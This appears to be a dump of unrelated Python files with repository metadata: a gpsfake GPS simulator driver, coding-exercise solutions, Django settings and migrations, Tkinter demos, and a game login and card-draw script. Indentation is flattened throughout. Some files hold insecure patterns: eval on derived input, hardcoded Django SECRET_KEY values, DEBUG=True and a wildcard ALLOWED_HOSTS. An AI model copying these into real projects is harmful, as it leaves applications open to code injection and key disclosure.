def __init__(self, prompt, endmsg=None):
self.stream = sys.stderr
self.stream.write(prompt + "...")
if os.isatty(self.stream.fileno()):
self.stream.write(" \b")
self.stream.flush()
self.count = 0
self.endmsg = endmsg
self.time = time.time()
return
def twirl(self, ch=None):
if self.stream is None:
return
if os.isatty(self.stream.fileno()):
if ch:
self.stream.write(ch)
self.stream.flush()
elif self.count % Baton.SPINNER_INTERVAL == 0:
self.stream.write("-/|\\"[self.count % 4])
self.stream.write("\b")
self.stream.flush()
self.count = self.count + 1
return
def end(self, msg=None):
if msg is None:
msg = self.endmsg
if self.stream:
self.stream.write("...(%2.2f sec) %s.\n" % (time.time() - self.time, msg))
return
def hexdump(s):
rep = ""
for c in s:
rep += "%02x" % ord(c)
return rep
def fakehook(linenumber, fakegps):
if len(fakegps.testload.sentences) == 0:
print >>sys.stderr, "fakegps: no sentences in test load."
raise SystemExit, 1
if linenumber % len(fakegps.testload.sentences) == 0:
if singleshot and linenumber > 0:
return False
if progress:
baton.twirl('*\b')
#elif not singleshot:
#sys.stderr.write("gpsfake: log cycle of %s begins.\n" % fakegps.testload.name)
time.sleep(cycle)
if linedump and fakegps.testload.legend:
ml = fakegps.testload.sentences[linenumber % len(fakegps.testload.sentences)].strip()
if not fakegps.testload.textual:
ml = hexdump(ml)
announce = fakegps.testload.legend % (linenumber % len(fakegps.testload.sentences) + 1) + ml
if promptme:
raw_input(announce + "? ")
else:
print announce
if progress:
baton.twirl()
return True
if __name__ == '__main__':
try:
(options, arguments) = getopt.getopt(sys.argv[1:], "1bc:D:ghilm:no:pP:rfM:s:StTuvx")
except getopt.GetoptError, msg:
print "gpsfake: " + str(msg)
raise SystemExit, 1
port = None
progress = False
cycle = 0
monitor = ""
speed = 4800
linedump = False
predump = False
pipe = False
singleshot = False
promptme = False
client_init = '?WATCH={"json":true,"nmea":true}'
doptions = ""
tcp = False
udp = False
verbose = 0
slow = False
managementport = None
management = False
withoutfile = False
for (switch, val) in options:
if switch == '-1':
singleshot = True
elif switch == '-b':
progress = True
elif switch == '-c':
cycle = float(val)
elif switch == '-D':
doptions += " -D " + val
elif switch == '-g':
monitor = "xterm -e gdb -tui --args "
elif switch == '-i':
linedump = promptme = True
elif switch == '-l':
linedump = True
elif switch == '-m':
monitor = val + " "
elif switch == '-n':
doptions += " -n"
elif switch == '-x':
predump = True
elif switch == '-o':
doptions = val
elif switch == '-p':
pipe = True
elif switch == '-P':
port = int(val)
elif switch == '-r':
client_init = val
elif switch == '-s':
speed = int(val)
elif switch == '-S':
slow = True
elif switch == '-t':
tcp = True
elif switch == '-T':
sys.stdout.write("sys %s platform %s: WRITE_PAD = %.5f\n" % (sys.platform, platform.platform(), gpsfake.WRITE_PAD))
raise SystemExit, 0
elif switch == '-u':
udp = True
elif switch == '-v':
verbose += 1
elif switch == '-M':
management = True
managementport = int(val)
elif switch == '-f':
withoutfile = True
elif switch == '-h':
sys.stderr.write("usage: gpsfake [-h] [-l] [-m monitor] [--D debug] [-o options] [-p] [-s speed] [-S] [-c cycle] [-b] logfile\n")
raise SystemExit, 0
print "File: " + str(withoutfile)
try:
pty.openpty()
except (AttributeError, OSError):
print >>sys.stderr, "gpsfake: ptys not available, falling back to UDP."
udp = True
if not arguments:
print >>sys.stderr, "gpsfake: requires at least one logfile argument."
raise SystemExit, 1
if progress and arguments:
baton = Baton("Processing %s" % ",".join(arguments), "done")
else:
print >>sys.stderr, "Processing %s" % ",".join(arguments)
# Don't allocate a private port when cycling logs for client testing.
if port is None and not pipe:
port = gps.GPSD_PORT
if management and managementport is None:
managementport = randint(20000,65000)
print "Management port: " + str(managementport)
queue = Queue.Queue()
tmppath = "workdir"
# Ensure the file is read/write by the creator only
saved_umask = os.umask(0077)
mythread = TCPThread(queue, managementport)
mythread.start()
print "Argument: " + str(arguments)
test = gpsfake.TestSession(prefix=monitor, port=port, options=doptions,
tcp=tcp, udp=udp, verbose=verbose,
predump=predump, slow=slow, queue=queue)
if pipe:
test.reporter = sys.stdout.write
if verbose:
progress = False
test.progress = sys.stdout.write
test.spawn()
try:
for logfile in arguments:
try:
sys.stderr.write(logfile+"\n")
test.gps_add(logfile, speed=speed, pred=fakehook, oneshot=singleshot)
except gpsfake.TestLoadError, e:
sys.stderr.write("gpsfake: " + e.msg + "\n")
raise SystemExit, 1
except gpsfake.PacketError, e:
sys.stderr.write("gpsfake: " + e.msg + "\n")
raise SystemExit, 1
except gpsfake.DaemonError, e:
sys.stderr.write("gpsfake: " + e.msg + "\n")
raise SystemExit, 1
except IOError, e:
if e.filename is None:
sys.stderr.write("gpsfake: unknown internal I/O error %s\n" % e)
else:
sys.stderr.write("gpsfake: no such file as %s or file unreadable\n" % e.filename)
raise SystemExit, 1
except OSError:
sys.stderr.write("gpsfake: can't open pty.\n")
raise SystemExit, 1
try:
if pipe:
test.client_add(client_init + "\n")
# Give daemon time to get ready for the feeds.
# Without a delay here there's a window for test
# sentences to arrive before the watch takes effect.
# This needs to increase if leading sentences in
# test loads aren't being processed.
time.sleep(1)
test.run(withoutfile)
except socket.error, msg:
sys.stderr.write("gpsfake: socket error %s.\n" % msg)
raise SystemExit, 1
except gps.client.json_error, e:
sys.stderr.write("gpsfake: JSON error on line %s is %s.\n" % (repr(e.data), e.explanation))
raise SystemExit, 1
except KeyboardInterrupt:
sys.stderr.write("gpsfake: aborted\n")
raise SystemExit, 1
finally:
mythread.running = False
test.cleanup()
print 'Close program, running: %r' % mythread.running
if progress:
baton.end()
# The following sets edit modes for GNU EMACS
# Local Variables:
# mode:python
# End:
|
[
"szzsolt92@gmail.com"
] |
szzsolt92@gmail.com
|
|
eb99ab34329327f2c45dd146512bf18c8ef09082
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/gJSkZgCahFmCmQj3C_2.py
|
d50a20751f09661bda0e9611af705c1da6d62a7d
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
"""
Create a function that returns the original value from a list with too many
sub-lists.
### Examples
de_nest([[[[[[[[[[[[3]]]]]]]]]]]]) ➞ 3
de_nest([[[[[[[True]]]]]]]) ➞ True
de_nest([[[[[[[[[[[[[[[[["edabit"]]]]]]]]]]]]]]]]]) ➞ "edabit"
### Notes
You only need to retrieve one element.
"""
def de_nest(lst):
return eval(str(lst).replace('[', '').replace(']', ''))
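# An alternative sketch that unwraps the list level by level instead of using eval
# (de_nest_loop is just an illustrative name, not part of the challenge):
def de_nest_loop(lst):
    while isinstance(lst, list):
        lst = lst[0]  # peel off one layer of nesting per iteration
    return lst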
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
37bf44a0f609cf6170a04deb132a1470a01c9574
|
c9775b4f74dab0c5e51ba56a6a75fc10520f2300
|
/ecomm/ecomm/settings.py
|
bc3dff88af5554f67c4d4e41f6fa8e6d8b762b0c
|
[
"MIT"
] |
permissive
|
aruntnp/MYPROJECTS
|
b8f9bf9782e66bb592ac271b5bd96f6bcbcebc32
|
a1aac3650db607c1a86c0d640a947588656f4f70
|
refs/heads/master
| 2020-04-07T07:11:57.905300
| 2018-12-17T06:00:34
| 2018-12-17T06:00:34
| 158,167,501
| 0
| 0
|
MIT
| 2018-12-17T06:00:36
| 2018-11-19T05:38:03
|
CSS
|
UTF-8
|
Python
| false
| false
| 4,696
|
py
|
"""
Django settings for ecomm project.
Generated by 'django-admin startproject' using Django 1.11.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
from easy_thumbnails.conf import Settings as thumbnail_settings
# ---------------- END ---------------
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATE_DIR = os.path.join(BASE_DIR, 'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'el)*wms615ps69v(6x7)sixp#+qp%q-e_o02ywtufblp^7gip4'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['localhost', '127.0.0.1', '*']
#
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# 3rd PARTY
'widget_tweaks',
'imagekit',
'mathfilters',
# 'fluent_dashboard',
# 'easy_thumbnails',
# 'image_cropping',
# 'suit',
# MY_APPS
'addresses',
# 'addressus',
'products',
'carts',
'accounts',
'orders',
'billing',
# MYFILE
]
AUTH_USER_MODEL = 'accounts.User'
THUMBNAIL_PROCESSORS = (
'image_cropping.thumbnail_processors.crop_corners',
) + thumbnail_settings.THUMBNAIL_PROCESSORS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
TEMPLATE_CONTEXT_PROCESSORS = (
"django.core.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.request",
)
ROOT_URLCONF = 'ecomm.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR, ],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
# # This is added by me:
# 'libraries': {
# 'cache_bust': 'accounts.templatetags.form_tags',
#
# }
# End me...
},
},
]
WSGI_APPLICATION = 'ecomm.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static-c/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static_my_proj"),
]
MEDIA_URL = '/media/'
STATIC_ROOT = os.path.join(os.path.dirname(BASE_DIR), "static_cdn", "static_root")
MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), "static_cdn", "media_root")
# ---------------------- REDIRECTION ----------------------------------
# LOGOUT_REDIRECT_URL = 'prod:ProductListView'
LOGOUT_REDIRECT_URL = 'home'
# LOGIN_REDIRECT_URL = 'home'
LOGIN_URL = 'login'
|
[
"aruntnp@gmail.com"
] |
aruntnp@gmail.com
|
986630c6696395614a2c1ce940ed8fdfb5a83198
|
bf97a169e18a256294018c0a81837e59680859d8
|
/ZigZagTree.py
|
cf567f46afb5cfd9fed941be2ccaa849f71cbb64
|
[] |
no_license
|
oskip/IB_Algorithms
|
780904842372a608362528758377344e126d3012
|
094d871ac4b808d883d5af5430bac47782132c6b
|
refs/heads/master
| 2021-01-19T04:25:13.948498
| 2016-07-04T16:55:09
| 2016-07-04T16:55:09
| 50,581,848
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,396
|
py
|
# Given a binary tree, return the zigzag level order traversal of its nodes' values.
# (ie, from left to right, then right to left for the next level and alternate between).
#
# Example :
# Given binary tree
#
# 3
# / \
# 9 20
# / \
# 15 7
# return
#
# [
# [3],
# [20, 9],
# [15, 7]
# ]
# Definition for a binary tree node
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
# @param A : root node of tree
# @return a list of list of integers
def zigzagLevelOrder(self, root):
res = [[root]]
wasAny = True
while wasAny:
lastRow = res[-1]
currRow = []
wasAny = False
for i in reversed(range(0,len(lastRow))):
if lastRow[i].right or lastRow[i].left: wasAny = True
if len(res) % 2 == 1: #rl
if lastRow[i].right: currRow.append(lastRow[i].right)
if lastRow[i].left: currRow.append(lastRow[i].left)
else: #lr
if lastRow[i].left: currRow.append(lastRow[i].left)
if lastRow[i].right: currRow.append(lastRow[i].right)
if(wasAny): res.append(currRow)
for i, arr in enumerate(res):
res[i] = [n.val for n in arr]
return res
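# Quick sanity check using the example tree from the comment above (3 / 9,20 / 15,7):
if __name__ == '__main__':
    root = TreeNode(3)
    root.left = TreeNode(9)
    root.right = TreeNode(20)
    root.right.left = TreeNode(15)
    root.right.right = TreeNode(7)
    print(Solution().zigzagLevelOrder(root))  # expected: [[3], [20, 9], [15, 7]]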
|
[
"oskipet@gmail.com"
] |
oskipet@gmail.com
|
5c3f9983e5425cda9d43278a436f6c1a7fc30d7e
|
81af4f5509ead2e3aecdcfef39d17f0a5da8502b
|
/simp-py-code/DL_9.8_PackManagerDemo.py
|
8536fe19460c9754f8f8132bc25fd957a29e38a6
|
[
"MIT"
] |
permissive
|
Michaeloye/python-journey
|
db2d96a0af893bc6b992c404d56b9be2341d8e74
|
ff8ce0e8796a129994f9a9a9dbb80340fa5790dc
|
refs/heads/main
| 2023-03-22T20:53:01.957824
| 2021-02-28T21:26:06
| 2021-02-28T21:26:06
| 342,891,353
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,419
|
py
|
from tkinter import *
class Pack_Manager_Demo_1:
def __init__(self):
window = Tk()
label_1 = Label(window, text = "blue", bg = "blue")
label_2 = Label(window, text = "red", bg = "red")
label_3 = Label(window, text = "green", bg = "green")
label_1.pack()
        label_2.pack(fill = BOTH, expand = 1) # fill sets which directions the widget stretches in (X, Y, or BOTH); expand = 1 lets the pack manager give it any extra space
label_3.pack(fill = BOTH)
window.mainloop()
Pack_Manager_Demo_1()
class Pack_Manager_Demo_2:
def __init__(self):
window = Tk()
self.label_1 = Label(window, text = "blue", bg = "blue")
self.label_2 = Label(window, text = "red", bg = "red")
self.label_3 = Label(window, text = "green", bg = "green")
        self.label_1.pack(side = LEFT) # side tells the pack manager which edge of the parent window to pack the widget against
        self.label_2.pack(side = LEFT, fill = BOTH, expand = 1) # fill sets which directions the widget stretches in; expand = 1 lets it take any extra space
self.label_3.pack(side = LEFT, fill = BOTH)
window.mainloop()
Pack_Manager_Demo_2()
|
[
"michealoye23@gmail.com"
] |
michealoye23@gmail.com
|
8f22ecc592588d5625846e343c4a6c77f30ddf4c
|
da8fd5c74dd23304b668b1e7b7ace549bc6db1ac
|
/bestoon/settings.py
|
fea5ee1075c11024cd00d53d6929ef29731b82d3
|
[] |
no_license
|
bahrambeigy/bestoon
|
8710e1e1c070413a23e62f276eafcf3297fa1004
|
b432508b78e99b3a9fbf16abc5a3d7f7b225954a
|
refs/heads/master
| 2021-01-19T13:17:48.318275
| 2017-02-18T12:52:23
| 2017-02-18T12:52:23
| 82,372,928
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,110
|
py
|
"""
Django settings for bestoon project.
Generated by 'django-admin startproject' using Django 1.10.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'u-!s%*mms#z$spoe76n%koe-378$8l*f!%2o^oe+c5mq_n4918'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'web',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'bestoon.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'bestoon.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
|
[
"bahramwhh@gmail.com"
] |
bahramwhh@gmail.com
|
727a0764849d0aa40033231339d636203c29c310
|
6ba96a57691e53f8694fe080870475d447790bf7
|
/moviesHaven/management/commands/removesymlink.py
|
eb6305ac6098a146898ae8210fbab67a25a40b8d
|
[] |
no_license
|
gahan9/mdb
|
194ae26778789e6137738190a598466a28e70165
|
71e3736bed7e3c55461df9fcd72cec5c933404fa
|
refs/heads/master
| 2020-04-01T11:26:02.725565
| 2018-04-26T05:28:15
| 2018-04-26T05:28:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,268
|
py
|
import os
from django.utils import timezone
from django.core.management.base import BaseCommand
from moviesHaven.models import StreamAuthLog
class Command(BaseCommand):
diff_hours = 4
    help = 'Removes the streams older than {} hours'.format(diff_hours)
def add_arguments(self, parser):
parser.add_argument('hours', nargs='?', type=int, default=self.diff_hours)
def handle(self, *args, **options):
arg = options.get('hours', None)
if arg is not None:
self.diff_hours = arg
time_diff = timezone.now() - timezone.timedelta(hours=self.diff_hours)
stream_instances = StreamAuthLog.objects.filter(date_created__lt=time_diff)
for stream in stream_instances:
if stream.sym_link_path:
try:
if os.path.exists(stream.sym_link_path):
os.remove(stream.sym_link_path)
self.stdout.write(self.style.SUCCESS('Successfully removed stream: {}'.format(stream.sym_link_path)))
stream.delete()
except Exception as e:
print("STREAM DELETE FAILED: {} - {}\nreason: {}".format(stream.id, stream.sym_link_path, e))
else:
stream.delete()
|
[
"gahan@quixom.com"
] |
gahan@quixom.com
|
a38acdad156f72fdd2500aa31e6c6b49ea96e5cc
|
10201699ebe5d9e2f74dd523ea445a7287c05edd
|
/profile_project/urls.py
|
0b22c8208fbbf0e91cd2f1f46975a01a72f0dd17
|
[] |
no_license
|
ravil1234/profiles-rest-api
|
58d6e64e7b82fe01833eaa96e97d74d0ddee9559
|
ca9857b212dcabc334aa08e193a45923e4a87825
|
refs/heads/master
| 2022-12-16T12:37:35.806357
| 2020-09-04T10:57:28
| 2020-09-04T10:57:28
| 291,421,416
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 810
|
py
|
"""profile_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
urlpatterns = [
path('admin/', admin.site.urls),
path('api/',include('profile_api.urls'))
]
|
[
"mohdravil000@gmail.com"
] |
mohdravil000@gmail.com
|
86be494a958b73f46e7e93e42390b4e092814fad
|
011f01e013439a672637402b13c81ec3b24893d2
|
/canFinish.py
|
25935b54deefd7cc6c7089babf6a7cb6444f836c
|
[] |
no_license
|
AkshayGyara/BFS-1
|
3fe961abf1864717f5099f39e46bbceb7e331f9f
|
20c3c215172d444b0da7a0688c77708ee62ce8fd
|
refs/heads/master
| 2022-11-11T21:50:33.142332
| 2020-06-24T07:56:11
| 2020-06-24T07:56:11
| 274,525,594
| 0
| 0
| null | 2020-06-23T22:59:01
| 2020-06-23T22:59:00
| null |
UTF-8
|
Python
| false
| false
| 1,228
|
py
|
#207. Course Schedule
# Time Complexity : O(v*e)
# Space Complexity :O(v*e)
# Did this code successfully run on Leetcode : Yes
# Any problem you faced while coding this : Yes
# I was getting the wrong output (False instead of True) for the test case 2 [[0,1]]; the bug was appending indegree[i] instead of the index i to the queue (fixed below).
from collections import deque, defaultdict
class Solution:
def canFinish(self, numCourses: int, prerequisites: List[List[int]]) -> bool:
if not numCourses:
return False
indegree = [0]*numCourses
dic = defaultdict(lambda : [])
for edges in prerequisites:
indegree[edges[0]] += 1
dic[edges[1]].append(edges[0])
queue = []
for i in range(len(indegree)):
if indegree[i] == 0:
                queue.append(i)  # fixed: enqueue the course index, not its (zero) in-degree
while queue:
key = queue.pop(0)
curr = dic[key]
for i in range(len(curr)):
indegree[curr[i]] -= 1
if indegree[curr[i]] == 0:
queue.append(curr[i])
for i in range(len(indegree)):
if indegree[i] > 0:
return False
return True
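# Trace of the previously failing case, numCourses=2 and prerequisites=[[0, 1]]:
# indegree = [1, 0] and dic = {1: [0]}, so only course 1 starts in the queue.
# Popping 1 drops indegree[0] to 0 and enqueues 0; every in-degree ends at 0,
# so the function now returns True as expected.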
|
[
"noreply@github.com"
] |
AkshayGyara.noreply@github.com
|
379064cb909876e595db016f6827ea4460162564
|
5ad0d71e4773661c18de3b1f5072db37e75d5a45
|
/utils/generator_exe1.py
|
fa177819dadad01a87728361f378b6307c78921c
|
[] |
no_license
|
rafaelvc/mestrado
|
c4d52eb0146900ea97522167a5de75a65abf6f2c
|
34b24ebbae386e6301cdb60bb8c1a6e28bec654a
|
refs/heads/master
| 2021-01-16T21:00:47.334364
| 2011-09-28T01:48:27
| 2011-09-28T01:48:27
| 2,471,637
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 204
|
py
|
def generator1(a):
pop = True
for z in a[:]:
if pop:
pop = False
r = a.pop()
else:
pop = True
r = a.pop(0)
yield r, a
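# Example: generator1 alternately pops from the back and then the front of the list.
#   for r, rest in generator1([1, 2, 3, 4, 5]): ...
# yields (5, [1, 2, 3, 4]), (1, [2, 3, 4]), (4, [2, 3]), (2, [3]) and finally (3, []).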
|
[
"verganic@gmail.com"
] |
verganic@gmail.com
|
a59d49b8d2d252b971247f1badc1e112991bdf00
|
cb689204f5d078c9c598bf0810a8cbd012b24f20
|
/PyDDerPub.py
|
b5f328d7d8c123784bfb6bcd75605cb8a8a80777
|
[
"MIT"
] |
permissive
|
bdnguyen/DailyDrawer
|
06fdbff3199af30cc471b028ce2672ca0f81039d
|
c9055d5ea09f3dd97b28cc574bed94fe70413f64
|
refs/heads/master
| 2020-04-08T08:39:05.110825
| 2017-01-23T10:24:29
| 2017-01-23T10:24:29
| 34,993,143
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,072
|
py
|
#!/usr/bin/env python3
import sys, argparse
import requests
from bs4 import BeautifulSoup
parser = argparse.ArgumentParser()
parser.add_argument(
'email', metavar='STR', type=str, help='enter email')
parser.add_argument(
'password', metavar='STR', type=str, help='enter password')
args = parser.parse_args()
email = sys.argv[1]
password = sys.argv[2]
soldierID1 = 361075717
soldierID2 = 371523810
session = requests.Session()
URL = 'https://battlefield.play4free.com/en/user/login/'
r1 = session.get(URL)
soup = BeautifulSoup(r1.content)
csrftoken = soup.find(id="csrf_token")['value']
payload = {'mail' : email, 'password' : password, '_csrf_token' : csrftoken}
r2 = session.post(URL, data=payload)
if email=='your_email@some_mail.com':
    r3 = session.get('https://battlefield.play4free.com/en/draw/drawCard?personaId='+str(soldierID1)+'&card=0&_csrf_token='+csrftoken)
else: r3 = session.get('https://battlefield.play4free.com/en/draw/drawCard?personaId='+str(soldierID2)+'&card=0&_csrf_token='+csrftoken)
print('Request response: ' + str(r3.status_code))
print(r3.text)
|
[
"binhduongng@gmail.com"
] |
binhduongng@gmail.com
|
4af65a91448180f526c96859c264e06b82df3b51
|
aa47bc1197aea44676cd3f189b36b4e6a1575fd7
|
/eshop_slider/admin.py
|
0b234c58bdc60f0cce8e2d6d776e4032f258b263
|
[] |
no_license
|
erfanmorsali/shop
|
03ab90ac60054754f34701a69138adb284db6a4c
|
17ca08378df283662cf5c5a71cd116176e388ec4
|
refs/heads/master
| 2023-04-27T21:39:02.776471
| 2021-05-20T07:01:59
| 2021-05-20T07:01:59
| 286,720,148
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 89
|
py
|
from django.contrib import admin
from .models import Slider
admin.site.register(Slider)
|
[
"erfanmorsali78@gmail.com"
] |
erfanmorsali78@gmail.com
|
12e8c7410faa6d00dbb211d6cb559d4ffcb70ecd
|
51651d7f17e80788e9e8030c35ae69339437eb4c
|
/thing/migrations/0021_auto_20170824_1953.py
|
f7f828489e8c96204219fb682bfbd97fe5e69a61
|
[
"BSD-2-Clause"
] |
permissive
|
skyride/evething-2
|
508c4300eb904e231d74861da3ee7a6384febe30
|
e0778a539b7f8a56667b2508293ca7e9f515283f
|
refs/heads/develop
| 2020-12-30T13:45:50.392322
| 2018-06-23T15:35:57
| 2018-06-23T15:35:57
| 91,246,619
| 21
| 10
|
BSD-2-Clause
| 2018-05-22T22:07:27
| 2017-05-14T13:53:09
|
Python
|
UTF-8
|
Python
| false
| false
| 693
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('thing', '0020_auto_20170707_0010'),
]
operations = [
migrations.AddField(
model_name='characterdetails',
name='jump_fatigue_expire_date',
field=models.DateTimeField(default=None, null=True),
preserve_default=True,
),
migrations.AddField(
model_name='characterdetails',
name='last_jump_date',
field=models.DateTimeField(default=None, null=True),
preserve_default=True,
),
]
|
[
"skylinerspeeder@gmail.com"
] |
skylinerspeeder@gmail.com
|
8a90e31922b050e237b026aa70cad9fd38a6277f
|
11aaa9f4fccab3f05deddb092fc87fd24f08d643
|
/music/migrations/0002_song_is_favourite.py
|
ea522cc3842d44cd1d4eb6a66538ec5db0a327ea
|
[] |
no_license
|
prorammerarc/Django-MediaPalyer
|
3282499c739670e74b742932ba133db086e97dcb
|
b97bedcd662ceff83eb645507cc04deb4956748f
|
refs/heads/master
| 2021-05-11T21:05:12.025427
| 2018-01-14T19:36:04
| 2018-01-14T19:36:04
| 117,460,494
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 378
|
py
|
# Generated by Django 2.0.1 on 2018-01-12 20:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('music', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='song',
name='is_favourite',
field=models.BooleanField(default=False),
),
]
|
[
"32127426+prorammerarc@users.noreply.github.com"
] |
32127426+prorammerarc@users.noreply.github.com
|
779c6db4958d4ad6d3df4f2936350c375c0adf64
|
cb92e6a682c6399eda74c90cb679737ee8752612
|
/OSINT_Platform/tests/test_models.py
|
0a999e4c2c498314dd7bb7ef57a66a9bcff2daf6
|
[
"BSD-3-Clause"
] |
permissive
|
Prontious/Dissertation
|
61a856be61d01b3d888ff45f436111d9e2d57b69
|
93d70079eaf401845420647c60145d6e709eb717
|
refs/heads/master
| 2020-03-23T15:18:12.075430
| 2018-07-20T16:56:29
| 2018-07-20T16:56:29
| 141,736,763
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,957
|
py
|
# -*- coding: utf-8 -*-
"""Model unit tests."""
import datetime as dt
import pytest
from OSINT_Platform.user.models import Role, User
from .factories import UserFactory
@pytest.mark.usefixtures('db')
class TestUser:
"""User tests."""
def test_get_by_id(self):
"""Get user by ID."""
user = User('foo', 'foo@bar.com')
user.save()
retrieved = User.get_by_id(user.id)
assert retrieved == user
def test_created_at_defaults_to_datetime(self):
"""Test creation date."""
